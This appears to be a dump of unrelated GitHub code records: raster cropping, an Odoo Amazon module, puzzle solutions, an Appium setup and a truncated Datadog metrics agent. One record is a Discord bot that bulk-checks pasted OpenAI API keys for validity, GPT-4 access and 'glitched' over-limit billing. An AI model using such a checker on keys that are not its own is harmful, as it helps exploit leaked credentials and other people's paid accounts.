print(isValid(str))\n","repo_name":"happyshui/leetcode","sub_path":"python/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12567890163","text":"import gdal\nimport pandas as pd\nimport rasterio\nfrom rasterio.tools.mask import mask\nfrom gdalconst import *\nimport numpy\nimport json\nfrom osgeo import gdal, ogr, osr\nfrom scipy.ndimage import imread\nimport os\nimport pickle\n\n# record information in Geojson file\n# including categorical ids, urls for labeled image, longitude and latitude\nids = [];\nurls = [];\nlongitude = [];\nlatitude = [];\n\n# my geojson file called harvey_list.geojson, you need to replace it with your file name\nwith open('harvey_list.geojson') as f:\n data = json.load(f)\n\nfor feature in data['features']:\n ids.append(feature['properties']['catalog_id'])\n urls.append(feature['properties']['chip_url'])\n longitude.append(feature['geometry']['coordinates'][0])\n latitude.append(feature['geometry']['coordinates'][1])\n\n# create dataframe to include all information above\n# add one column to record possible tif file's name for each observations in geojson\njson = pd.DataFrame({'ids': ids, 'urls': urls, 'long': longitude, 'lat': latitude, 'file': '0'})\n\n# set the path to reach the folder which include tif files\n# if you have the same directory with geojson file, just ignore this\nos.chdir('/Users/ZachCheu/PycharmProjects/DDS/links')\n\n\n# print out the range of longitutde and latitude of tif file within a square brackets\n# gt is the GetGeoTransform()\n# cols is the number of columns\n# rows is the number of rows\ndef GetRange(gt, cols, rows):\n ext = []\n ranges = []\n # get corner points\n xarr = [0, cols]\n yarr = [0, rows]\n for px in xarr:\n for py in yarr:\n x = gt[0] + (px * gt[1]) + (py * gt[2])\n y = gt[3] + (px * gt[4]) + (py * gt[5])\n ext.append([y, x])\n yarr.reverse()\n ranges.append([min(ext)[1], max(ext)[1]])\n ranges.append([min(ext)[0], max(ext)[0]])\n return ranges\n\n\n# create a new dataframe to record name of each tif file and its corresponding ranges\ntif_Range = pd.DataFrame(columns=['file_name', 'range'])\nfor filename in os.listdir(os.getcwd()):\n dataset = gdal.Open(filename, GA_ReadOnly)\n cols = dataset.RasterXSize\n rows = dataset.RasterYSize\n geotransform = dataset.GetGeoTransform()\n result = GetRange(geotransform, cols, rows)\n tif_Range = tif_Range.append({'file_name': filename, 'range': result}, ignore_index=True)\n\n# for each observation in geojson file, check whether its longitude and latitude are within the ranges for each tif file\n# if there's a tif's range satisfy, add the name of that tif file under the 'file' column in json dataframe\n# if more than one tif file satify, for now, I just used the last one\nfor i in range(json['file'].size):\n for j in range(tif_Range['range'].size):\n if (tif_Range['range'][j][1][0] < json['lat'][i] < tif_Range['range'][j][1][1] and tif_Range['range'][j][0][0] <\n json['long'][i] < tif_Range['range'][j][0][1]):\n json.loc[i, 'file'] = tif_Range['file_name'][j]\n\n # function for cropping\n\n\ndef Crop(filename, long, lat, output):\n dataset = gdal.Open(filename, GA_ReadOnly)\n cols = dataset.RasterXSize\n rows = dataset.RasterYSize\n bands = dataset.RasterCount\n driver = dataset.GetDriver().LongName\n projection = dataset.GetProjection()\n geotransform = dataset.GetGeoTransform()\n originX = geotransform[0] # top left x\n originY = geotransform[3] # top left y\n pixelWidth = geotransform[1]\n pixelHeight = -geotransform[5]\n band = dataset.GetRasterBand(1)\n\n # want to find raster indexes of top points, p1=[minX,maxY], and p2=[maxX, minY]\n xmin = long - 0.001\n ymax = lat + 0.001\n xmax = long + 0.001\n ymin = lat - 0.001\n geoms = [{'type': 'Polygon', 'coordinates': [[(xmin, ymax), (xmax, ymax), (xmax, ymin), (xmin, ymin)]]}]\n with rasterio.open(filename) as src:\n out_image, out_transform = mask(src, geoms, crop=True)\n out_meta = src.meta.copy()\n\n out_meta.update({\"driver\": \"GTiff\",\n \"height\": out_image.shape[1],\n \"width\": out_image.shape[2],\n \"transform\": out_transform})\n\n # just set the directory to save cropped image\n os.chdir('C:\\\\Users\\\\Xiaoyan\\\\Desktop\\\\DDS Research\\\\Crop')\n with rasterio.open(output + \".tif\", \"w\", **out_meta) as dest:\n dest.write(out_image)\n\n\n# I only download 20 sample tif files\n# I pick one available observation for cropping image\n# later, just use a for loop to run all observations in same procedure\nfile = json['file'][64]\nlong = json['long'][64]\nlat = json['lat'][64]\n# create name for output\noutput = 'sample2'\n# use the function above to crop\nCrop(file, long, lat, output)","repo_name":"zachcheu/Disaster-Data-Science-Lab","sub_path":"crop_img.py","file_name":"crop_img.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72974820199","text":"import re\nwith open('./test.txt') as file:\n lines =[re.search(r'(nop|acc|jmp) (\\+|-)(\\d+)', line.strip()).groups() for line in file.readlines()]\n\ndef get_deltas_jump(direction, delta):\n return (0, int(delta) if direction == '+' else -int(delta))\n\ndef get_deltas_acc(direction, delta):\n return (int(delta) if direction == '+' else -int(delta), 1)\n\ndef execute_line(line, can_switch):\n (operation, direction, delta) = line\n\n if (operation == 'nop'): \n switch = get_deltas_jump(direction, delta) if can_switch else False\n return (0, 1, switch)\n elif (operation == 'acc'): return (*get_deltas_acc(direction, delta), False)\n elif (operation == 'jmp'): \n switch = (0, 1) if can_switch else False\n return (*get_deltas_jump(direction, delta), switch)\n\n\ni = 0\nacc = 0\nexecuted = set()\n\ndef spawn_program(i, acc, executed):\n switched_at = None\n switched = set()\n while i < len(lines):\n \n (acc_delta, line_delta, switch) = execute_line(lines[i], i not in switched and not switched_at)\n if switch: \n switched_at = (i, acc, executed)\n (acc_delta, line_delta) = switch\n else:\n executed.add(i)\n acc += acc_delta\n i += line_delta\n\n if i in executed and switched_at:\n (i, acc, executed) = switched_at\n switched.add(i)\n switched_at = None\n \n\n if (i not in executed):\n print(f'Success: {acc}')\n\nspawn_program(0, 0, set())","repo_name":"benj2468/holiday-coding-challenge","sub_path":"src/day8/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39275108625","text":"from openerp import models,fields,api\nfrom openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT\nimport time\nclass amazon_operations_ept(models.Model):\n _name=\"amazon.operations.ept\"\n _order = \"sequence,id\"\n \n @api.model\n def find_amazon_cron(self,action_id):\n xml_ids = ['amazon_ept_v10.ir_cron_import_amazon_orders',\n 'amazon_ept_v10.ir_cron_auto_update_order_status',\n 'amazon_ept_v10.ir_cron_auto_export_inventory',\n 'amazon_ept_v10.ir_cron_send_amazon_invoice_via_email',\n 'amazon_ept_v10.ir_cron_auto_import_settlement_report',\n 'amazon_ept_v10.ir_cron_auto_process_settlement_report'\n ]\n cron_ids = []\n for xml_id in xml_ids:\n cron_exit = self.env.ref(xml_id,raise_if_not_found=False)\n if cron_exit:\n cron_ids.append(cron_exit.id)\n\n for instance in self.env['amazon.instance.ept'].search([]):\n for xml_id in xml_ids:\n cron_exit = self.env.ref(xml_id+'_instance_%d'%(instance.id),raise_if_not_found=False)\n if cron_exit:\n cron_ids.append(cron_exit.id)\n \n for seller in self.env['amazon.seller.ept'].search([]):\n for xml_id in xml_ids:\n cron_exit = self.env.ref(xml_id+'_seller_%d'%(seller.id),raise_if_not_found=False)\n if cron_exit:\n cron_ids.append(cron_exit.id)\n \n return cron_ids\n \n @api.one\n def _count_operations(self):\n if self.action_id and self.display_record_count:\n if self.action_id.res_model == 'ir.cron':\n cron_ids = self.find_amazon_cron(self.action_id)\n self.count_record = len(cron_ids) or 0\n else: \n domain =[]\n if self.action_id.domain:\n domain = eval(self.action_id.domain)\n count = self.env[self.action_id.res_model].search_count(domain)\n self.count_record = count or 0\n\n @api.multi\n def count_all(self):\n picking_obj=self.env['stock.picking']\n amazon_sale_order_obj=self.env['amazon.sale.order.ept']\n amazon_product_obj=self.env['amazon.product.ept']\n invoice_obj=self.env['account.invoice']\n amazon_order_refund_obj=self.env['amazon.order.refund.ept']\n for record in self:\n pickings=picking_obj.search([('is_amazon_delivery_order','=',True),('state','=','confirmed')])\n record.count_picking_confirmed=len(pickings.ids)\n pickings=picking_obj.search([('is_amazon_delivery_order','=',True),('state','=','assigned')])\n record.count_picking_assigned=len(pickings.ids)\n pickings=picking_obj.search([('is_amazon_delivery_order','=',True),('state','=','partially_available')])\n record.count_picking_partial=len(pickings.ids)\n pickings=picking_obj.search([('is_amazon_delivery_order','=',True),('state','=','done')])\n record.count_picking_done=len(pickings.ids)\n\n count_picking_late=[('min_date', '<', time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)), ('state', 'in', ('assigned', 'waiting', 'confirmed', 'partially_available')),('is_amazon_delivery_order','=',True)]\n count_picking_backorders=[('backorder_id', '!=', False), ('state', 'in', ('confirmed', 'assigned', 'waiting', 'partially_available')),('is_amazon_delivery_order','=',True)]\n count_picking=[('state', 'in', ('assigned', 'waiting', 'confirmed', 'partially_available')),('is_amazon_delivery_order','=',True)]\n\n count_picking=picking_obj.search(count_picking)\n count_picking_late=picking_obj.search(count_picking_late)\n count_picking_backorders=picking_obj.search(count_picking_backorders)\n \n if count_picking:\n record.rate_picking_late=len(count_picking_late.ids)*100/len(count_picking.ids)\n record.rate_picking_backorders=len(count_picking_backorders.ids)*100/len(count_picking.ids)\n else:\n record.rate_picking_late=0\n record.rate_picking_backorders=0\n record.count_picking_late=len(count_picking_late.ids)\n record.count_picking_backorders=len(count_picking_backorders.ids)\n orders=amazon_sale_order_obj.search([('state','in',['draft','sent'])])\n record.count_quotations=len(orders.ids)\n orders=amazon_sale_order_obj.search([('state','not in',['draft','sent','cancel'])])\n record.count_orders=len(orders.ids)\n\n products=amazon_product_obj.search([('instance_id','!=',False),('exported_to_amazon','=',True)])\n record.count_exported_products=len(products.ids)\n products=amazon_product_obj.search([('instance_id','!=',False),('exported_to_amazon','=',False)])\n record.count_ready_products=len(products.ids)\n \n invoices=invoice_obj.search([('amazon_instance_id','!=',False),('state','=','open'),('type','=','out_invoice')])\n record.count_open_invoices=len(invoices.ids)\n\n invoices=invoice_obj.search([('amazon_instance_id','!=',False),('state','=','paid'),('type','=','out_invoice')])\n record.count_paid_invoices=len(invoices.ids)\n \n draft_amazon_order_refunds=amazon_order_refund_obj.search([('state','=','draft')])\n record.count_draft_refunds=len(draft_amazon_order_refunds.ids)\n paid_amazon_order_refunds=amazon_order_refund_obj.search([('state','=','validate')])\n record.count_paid_refunds=len(paid_amazon_order_refunds.ids)\n \n action_id = fields.Many2one('ir.actions.act_window',string='Action')\n url = fields.Char('Image URL')\n sequence = fields.Integer('Sequence')\n color = fields.Integer('Color')\n name = fields.Char('Name', translate=True, required=True)\n count_record = fields.Integer(compute=_count_operations, string='# Record')\n display_inline_image = fields.Boolean('Display Inline Image in Kanban ?')\n display_outline_image = fields.Boolean('Display Outline Image in Kanban ?')\n display_record_count = fields.Boolean('Display Number of records in Kanban ?')\n \n use_quotations=fields.Boolean('Quotations', help=\"Check this box to manage quotations\")\n use_products=fields.Boolean(\"Products\",help=\"Check this box to manage Products\")\n use_invoices=fields.Boolean(\"Invoices\",help=\"Check This box to manage Invoices\")\n use_refunds=fields.Boolean(\"Refunds\",help=\"Check This box to manage Refunds\")\n use_delivery_orders=fields.Boolean(\"Delivery Orders\",help=\"Check This box to manage Delivery Orders\")\n use_amazon_workflow=fields.Boolean(\"Use Amazon Workflow\",help=\"Check This box to manage Amazon Workflow\") \n use_log=fields.Boolean(\"Use Log\",help=\"Check this box to manage Amazon Log\")\n \n count_exported_products=fields.Integer(\"Count Exported Products\",compute=\"count_all\")\n count_ready_products=fields.Integer(\"Count Exported Products\",compute=\"count_all\")\n \n count_quotations=fields.Integer(\"Count Sales Quotations\",compute=\"count_all\")\n count_orders=fields.Integer(\"Count Sales Orders\",compute=\"count_all\")\n \n count_open_invoices=fields.Integer(string=\"Count Open Invoices\",compute=\"count_all\")\n count_paid_invoices=fields.Integer(string=\"Count Open Invoices\",compute=\"count_all\")\n \n count_draft_refunds=fields.Integer(string=\"Count Draft Refunds\",compute=\"count_all\")\n count_paid_refunds=fields.Integer(string=\"Count Paid Refunds\",compute=\"count_all\")\n \n rate_picking_late=fields.Integer(string=\"Count Rate Pickings\",compute=\"count_all\")\n rate_picking_backorders=fields.Integer(string=\"Count Back Orders\",compute=\"count_all\")\n count_picking_late=fields.Integer(string=\"Count Rate Pickings\",compute=\"count_all\")\n count_picking_backorders=fields.Integer(string=\"Count Back Orders\",compute=\"count_all\")\n\n count_picking_confirmed=fields.Integer(string=\"Count Picking Waiting\",compute=\"count_all\")\n count_picking_assigned=fields.Integer(string=\"Count Picking Waiting\",compute=\"count_all\")\n count_picking_partial=fields.Integer(string=\"Count Picking Waiting\",compute=\"count_all\")\n count_picking_done=fields.Integer(string=\"Count Picking Waiting\",compute=\"count_all\")\n \n @api.multi\n def view_data(self):\n result = {}\n if self.action_id:\n result = self.action_id and self.action_id.read()[0] or {}\n if self.action_id.res_model == 'ir.cron':\n cron_ids = self.find_amazon_cron(self.action_id)\n result['domain'] = \"[('id','in',[\" + ','.join(map(str, cron_ids)) + \"])]\" \n else:\n result = self.action_id and self.action_id.read()[0] or {}\n return result ","repo_name":"ljp1992/mxnet","sub_path":"amazon_ept_v10/models/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":8931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"41948081025","text":"import math\ndef calculate_3d_distance(arr1,arr2):\n\tdistance = math.sqrt( (arr1[0]-arr2[0])**2 + (arr1[1]-arr2[1])**2 + (arr1[2]-arr2[2])**2 )\n\treturn distance\n\ncases = int(input())\nfor i in range(cases):\n\tline = input().rstrip().split(\" \")\n\tspaceship = list(map(int,line))\n\tenemies = []\n\tfor x in range(spaceship[3]):\n\t\tline = input().rstrip().split(\" \")\n\t\tenemy_temp = list(map(int,line))\n\t\tenemies.append(enemy_temp)\n\tamt_in_range = 0\n\tfor each_enemy in enemies:\n\t\tdistance = calculate_3d_distance(spaceship[:-1],each_enemy[:-1])\n\t\tif distance <= each_enemy[3]:\n\t\t\tamt_in_range += 1\n\tprint(\"You will be picked up by {} radars.\".format(amt_in_range))","repo_name":"Nate8888/programming-contest-practice","sub_path":"programming-team/First Semester/Eigth/spaceship.py","file_name":"spaceship.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21813441782","text":"import discord\r\nimport openai\r\nimport aiohttp\r\nimport asyncio\r\nfrom concurrent.futures import ThreadPoolExecutor\r\nfrom datetime import datetime, timedelta\r\nfrom discord.ext import commands\r\n\r\n# Your Discord bot token here\r\nTOKEN = 'token'\r\n\r\nintents = discord.Intents.default()\r\nintents.messages = True\r\nintents.guilds = True\r\nintents.message_content = True\r\n\r\nbot = commands.Bot(command_prefix='!', intents=intents)\r\nbot.remove_command('help')\r\n\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print(f'{bot.user.name} has connected to Discord!')\r\n\r\n\r\n@bot.command(name='help')\r\nasync def help_command(ctx):\r\n embed = discord.Embed(\r\n title=\"Bot Commands Help\",\r\n description=\"These are the available commands for the bot:\",\r\n color=discord.Color.blue()\r\n )\r\n\r\n embed.add_field(\r\n name=\"!checkkeys\",\r\n value=\"Usage:\\n !checkkeys\\n\\n\\n\\n...\\n\\nThis command checks the status and details of the OAI API keys. It can also detect keys with GPT-4 model and glitched keys.\",\r\n inline=False\r\n )\r\n\r\n await ctx.send(embed=embed)\r\n\r\n\r\nclass OAIKeyChecker:\r\n desired_models = [\"gpt-3.5-turbo\", \"gpt-3.5-turbo-0301\", \"gpt-4\", \"gpt-4-0314\"]\r\n usage_endpoint = 'https://api.openai.com/dashboard/billing/usage'\r\n subscription_endpoint = 'https://api.openai.com/dashboard/billing/subscription'\r\n\r\n @staticmethod\r\n def list_models(api_key):\r\n openai.api_key = api_key\r\n models = openai.Model.list()\r\n return [model.id for model in models['data']]\r\n\r\n @staticmethod\r\n def filter_models(models):\r\n return [model for model in models if model in OAIKeyChecker.desired_models]\r\n\r\n @staticmethod\r\n async def get_limits(api_key):\r\n headers = {\r\n \"authorization\": f\"Bearer {api_key}\",\r\n }\r\n async with aiohttp.ClientSession() as session:\r\n async with session.get(OAIKeyChecker.subscription_endpoint, headers=headers) as response:\r\n if response.status == 200:\r\n return await response.json()\r\n else:\r\n raise Exception(f\"Error fetching usage and limits: {response.text}\")\r\n\r\n @staticmethod\r\n def is_glitched(access_until, total_usage, hard_limit_usd):\r\n current_timestamp = datetime.now().timestamp()\r\n return current_timestamp > access_until or float(total_usage) >= (hard_limit_usd + 1)\r\n\r\n @staticmethod\r\n async def get_usage(api_key, start_date, end_date):\r\n headers = {\r\n \"authorization\": f\"Bearer {api_key}\",\r\n }\r\n async with aiohttp.ClientSession() as session:\r\n async with session.get(OAIKeyChecker.usage_endpoint, headers=headers, params={'start_date': start_date, 'end_date': end_date}) as response:\r\n response.raise_for_status()\r\n usage_data = await response.json()\r\n total_usage = usage_data.get('total_usage', 0) / 100\r\n return '{:.2f}'.format(total_usage)\r\n\r\n\r\n@bot.command(name='checkkeys')\r\nasync def checkkeys(ctx, *, keys_input: str = None):\r\n if keys_input:\r\n api_keys = [key.strip() for key in keys_input.splitlines() if key.strip()]\r\n else:\r\n api_keys = []\r\n\r\n # Add the start_date and end_date for the usage period\r\n start_date = (datetime.now() - timedelta(days=99)).strftime('%Y-%m-%d')\r\n end_date = (datetime.now() + timedelta(days=1)).strftime('%Y-%m-%d')\r\n\r\n # Send a message to let the user know their request is being processed\r\n await ctx.send(f'{ctx.author.mention} Processing request...')\r\n\r\n # Initialize the lists to store API keys with \"gpt-4\" models and glitched keys\r\n gpt_4_keys = []\r\n glitched_keys = []\r\n\r\n # Run the API key checks and store the results in a string\r\n result = ''\r\n \r\n async def process_api_key(idx, api_key):\r\n result = f\"API Key {idx}:\\n\"\r\n try:\r\n result += f\"{api_key}\\n\"\r\n usage_and_limits = await OAIKeyChecker.get_limits(api_key)\r\n access_until = datetime.fromtimestamp(usage_and_limits['access_until'])\r\n total_usage_formatted = await OAIKeyChecker.get_usage(api_key, start_date, end_date)\r\n\r\n if OAIKeyChecker.is_glitched(usage_and_limits['access_until'], total_usage_formatted, usage_and_limits['hard_limit_usd']):\r\n result += \"**!!!Possibly Glitched Key!!!**\\n\"\r\n glitched_keys.append(api_key)\r\n\r\n models = OAIKeyChecker.list_models(api_key)\r\n filtered_models = OAIKeyChecker.filter_models(models)\r\n\r\n if filtered_models:\r\n for model_id in filtered_models:\r\n result += f\" - {model_id}\\n\"\r\n\r\n if model_id == \"gpt-4\":\r\n gpt_4_keys.append(api_key)\r\n else:\r\n result += \" No desired models available.\\n\"\r\n\r\n result += f\" Access valid until: {access_until.strftime('%Y-%m-%d %H:%M:%S')}\\n\"\r\n result += f\" Soft limit: {usage_and_limits['soft_limit']}\\n\"\r\n result += f\" Soft limit USD: {usage_and_limits['soft_limit_usd']}\\n\"\r\n result += f\" Hard limit: {usage_and_limits['hard_limit']}\\n\"\r\n result += f\" Hard limit USD: {usage_and_limits['hard_limit_usd']}\\n\"\r\n result += f\" System hard limit: {usage_and_limits['system_hard_limit']}\\n\"\r\n result += f\" System hard limit USD: {usage_and_limits['system_hard_limit_usd']}\\n\"\r\n result += f\" Total usage USD: {total_usage_formatted}\\n\"\r\n except Exception as e:\r\n result += f\" This key is invalid or revoked\\n\"\r\n result += '\\n'\r\n return result\r\n\r\n async def run_concurrently(api_keys):\r\n with ThreadPoolExecutor() as executor:\r\n tasks = [asyncio.ensure_future(process_api_key(idx, api_key)) for idx, api_key in enumerate(api_keys, start=1)]\r\n results = await asyncio.gather(*tasks)\r\n return \"\".join(results)\r\n\r\n result = await run_concurrently(api_keys)\r\n\r\n result += f\"\\nNumber of API keys with 'gpt-4' model: {len(gpt_4_keys)}\\n\"\r\n for key in gpt_4_keys:\r\n result += f\" - {key}\\n\"\r\n\r\n result += f\"\\nNumber of possibly glitched API keys: {len(glitched_keys)}\\n\"\r\n for key in glitched_keys:\r\n result += f\" - {key}\\n\"\r\n\r\n # Group the information for each key\r\n key_information = result.split('\\n\\n')\r\n\r\n # Send the result to the Discord channel\r\n result_chunks = []\r\n current_chunk = ''\r\n\r\n for info in key_information:\r\n # Check if the info can be added to the current_chunk without exceeding the limit\r\n if len(current_chunk) + len(info) + 2 <= 1950:\r\n current_chunk += f\"{info}\\n\\n\"\r\n else:\r\n # If not, add the current_chunk to result_chunks and start a new chunk\r\n result_chunks.append(current_chunk)\r\n current_chunk = f\"{info}\\n\\n\"\r\n # Add the last chunk to result_chunks\r\n result_chunks.append(current_chunk)\r\n\r\n # Send the chunks to the Discord channel\r\n for idx, chunk in enumerate(result_chunks):\r\n if idx == 0:\r\n await ctx.send(f'{ctx.author.mention}\\n```{chunk}```')\r\n else:\r\n await ctx.send(f'```{chunk}```')\r\n \r\n# Run the bot\r\nbot.run(TOKEN)","repo_name":"ElioCampos/OAI_API_Checker","sub_path":"OAI_API_Discord_Bot.py","file_name":"OAI_API_Discord_Bot.py","file_ext":"py","file_size_in_byte":7343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"33526401091","text":"N = int(input())\nc = list(map(int, input().split()))\nt = list(map(int, input().split()))\n\nt1, t2, t3 = [], [], []\nfor i in range(N):\n if t[i] == 1:\n t1.append(c[i])\n elif t[i] == 2:\n t2.append(c[i])\n else:\n t3.append(c[i])\n\nif t1 and t2 and t3:\n m3 = min(t3) \n m12 = min(t1) + min(t2) \n print(m3 if m3<=m12 else m12)\nelif t3:\n print(min(t3))\nelse:\n print(min(t1) + min(t2))\n \n","repo_name":"Sanket-Mathur/CodeChef-Practice","sub_path":"CHEFWORK.py","file_name":"CHEFWORK.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"29812670474","text":"from appium import webdriver\nfrom test_app_weixin.page.base_page import BasePage\nfrom test_app_weixin.page.main_page import MainPage\n\n\nclass App(BasePage):\n # app启动时的通用参数\n def start(self):\n if self.driver is None:\n desired_caps = {\n \"platformName\": \"Android\",\n \"deviceName\": \"127.0.0.1:5555\",\n \"platformVersion\": \"7.1.2\",\n \"appPackage\": \"com.tencent.wework\",\n \"appActivity\": \".launch.WwMainActivity\",\n \"noReset\": \"true\",\n \"dontStopAppOnReset\": \"true\",\n \"unicodeKeyBoard\": \"true\",\n \"resetKeyBoard\": \"true\",\n \"settings[waitForIdleTimeout]\": 0\n }\n self.driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)\n else:\n self.driver.launch_app()\n self.driver.implicitly_wait(10)\n\n def goto_main(self):\n return MainPage(self.driver)\n","repo_name":"PAssassiN/hogwarts_ck16","sub_path":"test_app_weixin/page/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7564987739","text":"#!/usr/bin/env python\nimport ConfigParser\nimport collections\nimport json\nimport logging\nimport os\nimport re\nimport socket\nimport sys\nimport time\nfrom optparse import OptionParser\nfrom itertools import islice\n\nimport datadog\nimport requests\n\n'''\nThis script gathers metric data from opentsdb and use http api to send to Insightfinder\n'''\n\n\ndef get_parameters():\n usage = \"Usage: %prog [options]\"\n parser = OptionParser(usage=usage)\n parser.add_option(\"-w\", \"--serverUrl\",\n action=\"store\", dest=\"serverUrl\", help=\"Server Url\")\n parser.add_option(\"-c\", \"--chunkLines\",\n action=\"store\", dest=\"chunkLines\", help=\"Timestamps per chunk for historical data.\")\n parser.add_option(\"-l\", \"--logLevel\",\n action=\"store\", dest=\"logLevel\", help=\"Change log verbosity(WARNING: 0, INFO: 1, DEBUG: 2)\")\n (options, args) = parser.parse_args()\n\n params = {}\n if options.serverUrl is None:\n params['serverUrl'] = 'https://app.insightfinder.com'\n else:\n params['serverUrl'] = options.serverUrl\n if options.chunkLines is None:\n params['chunkLines'] = 50\n else:\n params['chunkLines'] = int(options.chunkLines)\n params['logLevel'] = logging.INFO\n if options.logLevel == '0':\n params['logLevel'] = logging.WARNING\n elif options.logLevel == '1':\n params['logLevel'] = logging.INFO\n elif options.logLevel >= '2':\n params['logLevel'] = logging.DEBUG\n\n return params\n\n\ndef get_agent_config_vars():\n if os.path.exists(os.path.abspath(os.path.join(__file__, os.pardir, \"config.ini\"))):\n config_parser = ConfigParser.SafeConfigParser()\n config_parser.read(os.path.abspath(os.path.join(__file__, os.pardir, \"config.ini\")))\n try:\n user_name = config_parser.get('insightfinder', 'user_name')\n license_key = config_parser.get('insightfinder', 'license_key')\n project_name = config_parser.get('insightfinder', 'project_name')\n sampling_interval = config_parser.get('insightfinder', 'sampling_interval')\n all_metrics = []\n filter_hosts = []\n\n if len(config_parser.get('insightfinder', 'all_metrics')) != 0:\n all_metrics = config_parser.get('insightfinder', 'all_metrics').split(\",\")\n else:\n temp_metrics = get_metric_list_from_file()\n if temp_metrics is not None and len(temp_metrics) != 0:\n all_metrics = temp_metrics\n else:\n all_metrics = ['system.cpu.user', 'system.cpu.idle', 'system.cpu.system', 'system.disk.used',\n 'system.disk.free', 'system.mem.pct_usable', 'system.mem.total',\n 'system.mem.used', 'system.net.bytes_rcvd', 'system.net.bytes_sent',\n 'system.swap.used', 'system.net.packets_in.error', 'system.net.packets_out.error']\n if len(config_parser.get('insightfinder', 'filter_hosts')) != 0:\n filter_hosts = config_parser.get('insightfinder', 'filter_hosts').split(\",\")\n else:\n filter_hosts = get_host_list_from_file()\n if_http_proxy = config_parser.get('insightfinder', 'if_http_proxy')\n if_https_proxy = config_parser.get('insightfinder', 'if_https_proxy')\n host_chunk_size = int(config_parser.get('insightfinder', 'host_chunk_size'))\n metric_chunk_size = int(config_parser.get('insightfinder', 'metric_chunk_size'))\n except ConfigParser.NoOptionError:\n logger.error(\n \"Agent not correctly configured. Check config file.\")\n sys.exit(1)\n\n if len(user_name) == 0:\n logger.warning(\n \"Agent not correctly configured(user_name). Check config file.\")\n sys.exit(1)\n if len(license_key) == 0:\n logger.warning(\n \"Agent not correctly configured(license_key). Check config file.\")\n sys.exit(1)\n if len(project_name) == 0:\n logger.warning(\n \"Agent not correctly configured(project_name). Check config file.\")\n sys.exit(1)\n\n config_vars = {\n \"userName\": user_name,\n \"licenseKey\": license_key,\n \"projectName\": project_name,\n \"allMetrics\": all_metrics,\n \"filterHosts\": filter_hosts,\n \"samplingInterval\": sampling_interval,\n \"hostChunkSize\": host_chunk_size,\n \"metricChunkSize\": metric_chunk_size,\n \"httpProxy\": if_http_proxy,\n \"httpsProxy\": if_https_proxy\n }\n\n return config_vars\n else:\n logger.error(\n \"Agent not correctly configured. Check config file.\")\n sys.exit(1)\n\n\ndef get_datadog_config():\n \"\"\"Read and parse DataDog config from config.ini\"\"\"\n if os.path.exists(os.path.abspath(os.path.join(__file__, os.pardir, \"config.ini\"))):\n config_parser = ConfigParser.SafeConfigParser()\n config_parser.read(os.path.abspath(os.path.join(__file__, os.pardir, \"config.ini\")))\n try:\n datadog_app_key = config_parser.get('datadog', 'app_key')\n datadog_api_key = config_parser.get('datadog', 'api_key')\n datadog_http_proxy = config_parser.get('datadog', 'datadog_http_proxy')\n datadog_https_proxy = config_parser.get('datadog', 'datadog_https_proxy')\n except ConfigParser.NoOptionError:\n logger.error(\n \"Agent not correctly configured. Check config file.\")\n sys.exit(1)\n\n if len(datadog_app_key) == 0:\n logger.warning(\n \"Agent not correctly configured(APP KEY). Check config file.\")\n exit()\n if len(datadog_api_key) == 0:\n logger.warning(\n \"Agent not correctly configured(API KEY). Check config file.\")\n exit()\n\n datadog_config = {\n \"DATADOG_APP_KEY\": datadog_app_key,\n \"DATADOG_API_KEY\": datadog_api_key,\n \"httpProxy\": datadog_http_proxy,\n \"httpsProxy\": datadog_https_proxy\n }\n else:\n logger.warning(\"No config file found. Exiting...\")\n exit()\n\n return datadog_config\n\n\ndef get_metric_list_from_file():\n \"\"\"Get available metric list from File\"\"\"\n metric_list = set()\n if os.path.exists(os.path.abspath(os.path.join(__file__, os.pardir, \"metrics.txt\"))):\n with open(os.path.abspath(os.path.join(__file__, os.pardir, \"metrics.txt\")), 'r') as f:\n for line in f:\n if line not in ['\\n', '\\r\\n']:\n metric_list.add(line.replace('\\n', ''))\n logger.debug(\"Get metric list from file: \" + str(metric_list))\n return list(metric_list)\n\n\ndef get_host_list_from_file():\n \"\"\"Get available host list from File\"\"\"\n metric_list = set()\n if os.path.exists(os.path.abspath(os.path.join(__file__, os.pardir, \"hosts.txt\"))):\n with open(os.path.abspath(os.path.join(__file__, os.pardir, \"hosts.txt\")), 'r') as f:\n for line in f:\n if line not in ['\\n', '\\r\\n']:\n metric_list.add(line.replace('\\n', ''))\n logger.debug(\"Get host list from file: \" + str(metric_list))\n return list(metric_list)\n\n\ndef get_metric_list():\n \"\"\"Get available metric list from Datadog API\"\"\"\n metric_list = []\n from_time = int(time.time()) - 60 * 60 * 24 * 1\n result = datadog.api.Metric.list(from_time)\n if 'metrics' in result.keys() and len(result['metrics']) != 0:\n metric_list = list(result['metrics'])\n return metric_list\n\n\ndef get_host_list():\n \"\"\"Get available host list from Datadog API\"\"\"\n hosts_list = []\n host_totals = datadog.api.Hosts.totals()\n total_hosts = 0\n if 'total_active' in host_totals.keys():\n total_hosts = int(host_totals['total_active'])\n if total_hosts > 100:\n for index in range(0, total_hosts + 1, 100):\n result = datadog.api.Hosts.search(start=index)\n if 'host_list' in result.keys() and len(result['host_list']) != 0:\n for host_meta in result['host_list']:\n hosts_list.append(host_meta[\"name\"])\n else:\n result = datadog.api.Hosts.search()\n if 'host_list' in result.keys() and 